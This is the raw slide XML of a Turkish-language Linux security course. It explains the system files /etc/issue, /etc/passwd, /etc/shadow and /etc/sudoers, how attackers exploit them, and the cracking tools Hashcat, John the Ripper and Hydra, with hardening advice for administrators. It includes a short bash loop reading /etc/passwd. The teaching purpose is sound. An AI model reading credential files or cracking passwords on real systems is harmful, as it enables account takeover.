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Roboto"/>
      <p:regular r:id="rId110"/>
      <p:bold r:id="rId111"/>
      <p:italic r:id="rId112"/>
      <p:boldItalic r:id="rId113"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono"/>
      <p:regular r:id="rId114"/>
      <p:bold r:id="rId115"/>
      <p:italic r:id="rId116"/>
      <p:boldItalic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ED9964D-1338-4093-AAAA-D3ECB9C76E77}">
  <a:tblStyle styleId="{1ED9964D-1338-4093-AAAA-D3ECB9C76E7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schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-boldItalic.fntdata"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.fntdata"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold.fntdata"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId110"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Mono-regular.fntdata"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.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100" y="812520"/>
            <a:ext cx="7127100" cy="40089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g2a5a4558287_0_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29" name="Google Shape;29;g2a5a4558287_0_0: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 name="Google Shape;30;g2a5a4558287_0_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9df184e96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9df184e960_0_4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9e8060eac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9e8060eac0_0_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9e8060ea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9e8060eac0_0_4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9df184e96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9df184e960_0_2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ad1b918ce9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ad1b918ce9_1_26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a6a963d26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a6a963d266_0_15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360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="12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1ca0a5d36_1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1ca0a5d36_1_37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9df184e96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9df184e960_0_16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df184e96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df184e960_0_15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d1b918ce9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d1b918ce9_1_25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1ca0a5d36_1_71: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131" name="Google Shape;131;g261ca0a5d36_1_71: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 name="Google Shape;132;g261ca0a5d36_1_71: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1ca0a5d36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1ca0a5d36_1_21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1ca0a5d36_1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1ca0a5d36_1_28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61ca0a5d3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61ca0a5d36_1_1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1ca0a5d36_1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1ca0a5d36_1_39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133e70d9ff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133e70d9ff9_0_1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1ca0a5d36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1ca0a5d36_1_12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1ca0a5d36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61ca0a5d36_1_13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1ca0a5d36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1ca0a5d36_1_2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61ca0a5d36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61ca0a5d36_1_2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9df184e9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9df184e960_0_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9df184e96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9df184e960_0_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df184e96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df184e960_0_9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61ca0a5d36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61ca0a5d36_1_14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1ca0a5d36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1ca0a5d36_1_24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1ca0a5d36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1ca0a5d36_1_22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29df184e96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29df184e960_0_3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61ca0a5d36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61ca0a5d36_1_15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ad1b918ce9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ad1b918ce9_1_24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61ca0a5d36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61ca0a5d36_1_25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9df184e96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9df184e960_0_11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d1b918ce9_1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d1b918ce9_1_19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9df184e96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9df184e960_0_14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61ca0a5d36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61ca0a5d36_1_26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9df184e96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9df184e960_0_1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9df184e96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9df184e960_0_12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1ca0a5d36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1ca0a5d36_1_1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261ca0a5d36_0_198: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48" name="Google Shape;48;g261ca0a5d36_0_198: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g261ca0a5d36_0_198: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1ca0a5d36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1ca0a5d36_1_18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61ca0a5d36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61ca0a5d36_1_19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9df184e9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9df184e960_0_5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9df184e96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9df184e960_0_17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#!/bin/bash</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Kontrol edilecek kullanıcı ID'si</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hedef_kullanici_id="1234"</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/etc/passwd dosyasındaki kullanıcıları kontrol et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while IFS=: read -r kullanici adi kullanici_id gercek_ad homedizin komut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do</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if [ "$kullanici_id" = "$hedef_kullanici_id" ]; then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"Aynı ID'ye sahip kullanıcı bulundu:"</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"Kullanıcı Adı: $kullanici"</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"Kullanıcı ID: $kullanici_id"</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"Gerçek Ad: $gercek_ad"</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"Ev Dizini: $homedizin"</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"Komut: $komut"</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echo "------------------------"</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  fi</a:t>
            </a:r>
            <a:endParaRPr sz="10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US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>done &lt; /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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1ca0a5d3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1ca0a5d36_0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1ca0a5d36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1ca0a5d36_1_2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4325c398f_0_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398" name="Google Shape;398;g2a4325c398f_0_0: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9" name="Google Shape;399;g2a4325c398f_0_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61ca0a5d36_0_92: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407" name="Google Shape;407;g261ca0a5d36_0_92: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8" name="Google Shape;408;g261ca0a5d36_0_92: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61ca0a5d3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61ca0a5d36_1_27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61ca0a5d36_1_295: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424" name="Google Shape;424;g261ca0a5d36_1_295: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5" name="Google Shape;425;g261ca0a5d36_1_295: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61ca0a5d3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61ca0a5d36_0_18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d1b918ce9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ad1b918ce9_1_20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61ca0a5d36_1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61ca0a5d36_1_30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61ca0a5d36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61ca0a5d36_1_10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61ca0a5d36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61ca0a5d36_0_10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/etc/issue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, sistemdeki işletim sistemi bilgilerinin ve sürüm numarasının görüntülendiği bir sistem dosyasıdır. Aşağıdaki komutla bu dosyayı görüntüleyebilirsiniz:</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örnekte, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Ubuntu 20.04.3 LTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> işletim sistemi adı ve sürüm numarasını gösterir. yeni satır karakteri ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>\l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sistem adını (kernel) gösterir. Bu bilgiler, özellikle oturum açma ekranlarında ve uzaktan bağlantı araçlarında kullanılır.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bilgiler, bir hackerın hedef sistem için özel olarak hazırlanmış saldırı araçları kullanmasına yardımcı olabilir. Örneğin, bir hedef sisteme özel bir saldırı aracı hazırlayabilir veya belirli bir zafiyeti hedefleyebilirler.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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/issue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, bir saldırganın sahte oturum açma ekranları oluşturmasına da yardımcı olabilir. Bu dosyadaki bilgileri kullanarak, bir hacker, hedef sistem kullanıcısına, güvenli bir sayfa olarak görünen bir sahte oturum açma ekranı sunabilir ve kullanıcının kimlik bilgilerini çalabilir.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61ca0a5d3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61ca0a5d36_0_11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/etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, bir Linux sistemde bulunan kullanıcı hesapları hakkında bilgi içeren bir sistem dosyasıdır. Bu dosya, kullanıcı adları, şifreleme yöntemleri, kullanıcı kimlik numaraları (UID) ve diğer hesap bilgilerini içerir.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Aşağıda, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>cat /etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> komutunun örnek bir çıktısı verilmiştir:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burada, her bir kullanıcı hesabı bir satıra yazılmıştır. Satır, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> işaretiyle ayrılmış altı alandan oluşur. Alanlar sırasıyla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Kullanıcı adı</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(şifrelenmiş biçimde görüntülenir)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 kimlik numarası (UID)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grup kimlik numarası (GID)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Tam ad veya açıklama</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ev dizini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varsayılan shell</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Bir hacker,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bilgileri kullanarak saldırılar gerçekleştirebilir. Örneğin, şifrelerin şifreli biçimde depolandığı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şifreleri kırmak için brute force saldırıları yapabilir veya şifreleme yöntemlerindeki güvenlik açıklarını kullanarak şifreleri çözebilir.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Ayrıca,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kullanıcı adları ve kimlik numaraları, hedef sistemin yapılandırması hakkında bilgi sağlayabilir ve bir hacker'ın hedef sistemi daha iyi anlamasına yardımcı olabilir. Bu nedenle, sistem yöneticilerinin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasına sadece belirli kullanıcıların erişmesini sağlamaları ve kullanıcı şifrelerini güçlü şifreleme yöntemleriyle saklamaları önemlidir.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1ca0a5d36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1ca0a5d36_1_40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/etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, bir Linux sistemde bulunan kullanıcı hesapları hakkında bilgi içeren bir sistem dosyasıdır. Bu dosya, kullanıcı adları, şifreleme yöntemleri, kullanıcı kimlik numaraları (UID) ve diğer hesap bilgilerini içerir.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Aşağıda, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>cat /etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> komutunun örnek bir çıktısı verilmiştir:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burada, her bir kullanıcı hesabı bir satıra yazılmıştır. Satır, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> işaretiyle ayrılmış altı alandan oluşur. Alanlar sırasıyla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Kullanıcı adı</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(şifrelenmiş biçimde görüntülenir)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 kimlik numarası (UID)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grup kimlik numarası (GID)</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Tam ad veya açıklama</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ev dizini</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Kullanıcının varsayılan shell</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bir hacker,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bilgileri kullanarak saldırılar gerçekleştirebilir. Örneğin, şifrelerin şifreli biçimde depolandığı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şifreleri kırmak için brute force saldırıları yapabilir veya şifreleme yöntemlerindeki güvenlik açıklarını kullanarak şifreleri çözebilir.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Ayrıca,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kullanıcı adları ve kimlik numaraları, hedef sistemin yapılandırması hakkında bilgi sağlayabilir ve bir hacker'ın hedef sistemi daha iyi anlamasına yardımcı olabilir. Bu nedenle, sistem yöneticilerinin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasına sadece belirli kullanıcıların erişmesini sağlamaları ve kullanıcı şifrelerini güçlü şifreleme yöntemleriyle saklamaları önemlidir.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1ca0a5d36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1ca0a5d36_0_12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/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, bir Linux sistemindeki kullanıcı hesaplarına ait şifrelerin (şifreleme biçiminde) tutulduğu bir sistem dosyasıdır. Bu dosya,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kullanıcı hesaplarına ait şifrelerin yerini almıştır ve daha güvenli bir şekilde şifreleri saklamaktadır.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Burada, her bir kullanıcı hesabının şifresi ayrı bir satırda görüntülenmiştir. Satır, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> işaretiyle ayrılmış 9 alandan oluşur. Alanlar sırasıyla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Kullanıcı adı</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(şifrelenmiş biçimde görüntülenir)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değiştirme tarihi (UNIX zaman damgası biçiminde)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değiştirme sıklığı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geçerlilik süresi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uyarı süresi (şifrenin dolmasına kaç gün kala uyarı verileceği -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kullanım kısıtlaması (şifrenin değiştirilmesine kaç gün kala kullanıcı hesabı kilitleneceği -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Hesap son kullanım tarihi (UNIX zaman damgası biçiminde)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Hesapın geçerlilik süresi (gün cinsinden)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Bir hacker, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasındaki bilgileri kullanarak saldırılar gerçekleştirebilir. Örneğin, şifreleri kırmak için brute force veya dictionary attack saldırıları yapabilir veya şifreleme yöntemlerindeki güvenlik açıklarını kullanarak şifreleri çözebilir.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 nedenle, sistem yöneticilerinin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasına sadece belirli kullanıcıların erişmesini sağlamaları ve şifreleme yöntemlerindeki güvenlik açıklarını gidermeleri önemlidir. Ayrıca, şifreleme yöntemi olarak kullanılan hashing algoritmalarının güncel ve güvenli olmasına dikkat edilmelidir. Eski veya zayıf hashing algoritmaları, şifrelerin kolayca kırılmasına neden olabilir.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/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasındaki şifreli parolaların kırılması için çeşitli araçlar ve teknikler kullanılabilir. Bazı yaygın kullanılan araçlar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Hashcat: Bu araç, bir brute-force (kaba kuvvet) saldırısı yöntemiyle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasındaki şifreleri kırar. Hashcat, CPU ve GPU desteği ile çalışır ve birçok farklı hashing algoritmasını destekler.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John the Ripper: Bu araç, bir parola kırma aracıdır ve Linux, Unix ve diğer işletim sistemlerinde kullanılan birçok hashing algoritmasını destekler.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Hydra: Bu araç, belirli bir sistemdeki parolaları kırmak için brute-force saldırısı yöntemini kullanır. SSH, FTP, Telnet, HTTP POST, HTTP GET, HTTP Proxy vb. birçok protokolü destekler.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120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61ca0a5d36_1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261ca0a5d36_1_41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/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, bir Linux sistemindeki kullanıcı hesaplarına ait şifrelerin (şifreleme biçiminde) tutulduğu bir sistem dosyasıdır. Bu dosya, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasındaki kullanıcı hesaplarına ait şifrelerin yerini almıştır ve daha güvenli bir şekilde şifreleri saklamaktadır.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Burada, her bir kullanıcı hesabının şifresi ayrı bir satırda görüntülenmiştir. Satır, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> işaretiyle ayrılmış 9 alandan oluşur. Alanlar sırasıyla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Kullanıcı adı</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(şifrelenmiş biçimde görüntülenir)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değiştirme tarihi (UNIX zaman damgası biçiminde)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değiştirme sıklığı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geçerlilik süresi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uyarı süresi (şifrenin dolmasına kaç gün kala uyarı verileceği -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Şifre kullanım kısıtlaması (şifrenin değiştirilmesine kaç gün kala kullanıcı hesabı kilitleneceği - gün cinsinden)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Hesap son kullanım tarihi (UNIX zaman damgası biçiminde)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Hesapın geçerlilik süresi (gün cinsinden)</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rPr>
              <a:t>Bir hacker, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasındaki bilgileri kullanarak saldırılar gerçekleştirebilir. Örneğin, şifreleri kırmak için brute force veya dictionary attack saldırıları yapabilir veya şifreleme yöntemlerindeki güvenlik açıklarını kullanarak şifreleri çözebilir.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 nedenle, sistem yöneticilerinin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasına sadece belirli kullanıcıların erişmesini sağlamaları ve şifreleme yöntemlerindeki güvenlik açıklarını gidermeleri önemlidir. Ayrıca, şifreleme yöntemi olarak kullanılan hashing algoritmalarının güncel ve güvenli olmasına dikkat edilmelidir. Eski veya zayıf hashing algoritmaları, şifrelerin kolayca kırılmasına neden olabilir.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/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasındaki şifreli parolaların kırılması için çeşitli araçlar ve teknikler kullanılabilir. Bazı yaygın kullanılan araçlar şunlardır:</a:t>
            </a:r>
            <a:endParaRPr sz="11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US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hashcat: Bu araç, bir brute-force (kaba kuvvet) saldırısı yöntemiyle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasındaki şifreleri kırar. Hashcat, CPU ve GPU desteği ile çalışır ve birçok farklı hashing algoritmasını destekler.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John the Ripper: Bu araç, bir parola kırma aracıdır ve Linux, Unix ve diğer işletim sistemlerinde kullanılan birçok hashing algoritmasını destekler.</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US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hydra: Bu araç, belirli bir sistemdeki parolaları kırmak için brute-force saldırısı yöntemini kullanır. SSH, FTP, Telnet, HTTP POST, HTTP GET, HTTP Proxy vb. birçok protokolü destekler.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120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61ca0a5d36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61ca0a5d36_0_1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/etc/sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyası, bir Linux sistemi üzerinde kullanıcılara sudo komutunu kullanma izni veren yapılandırma dosyasıdır. Bu dosya, sistem yöneticileri tarafından düzenlenir ve genellikle root kullanıcısının ayrıcalıklarını diğer kullanıcılara genişletmek için kullanılır.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rgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/sudoers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dosyasında, hangi kullanıcıların sudo komutunu kullanabileceği, hangi komutların kullanılabileceği, hangi kullanıcılara hangi yetkilerin verileceği gibi bilgiler belirtilir.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a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bu satır, "john" kullanıcısına tüm komutları ve tüm kullanıcılara ait tüm hakları kullanabilmesi için izin verir. Bu izinler, "john" kullanıcısının sistemi yönetme yetkilerini genişletir ve aynı zamanda bu yetkilerin yanlış ellerde kullanılmasına da neden olabilir.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 nedenle, </a:t>
            </a:r>
            <a:r>
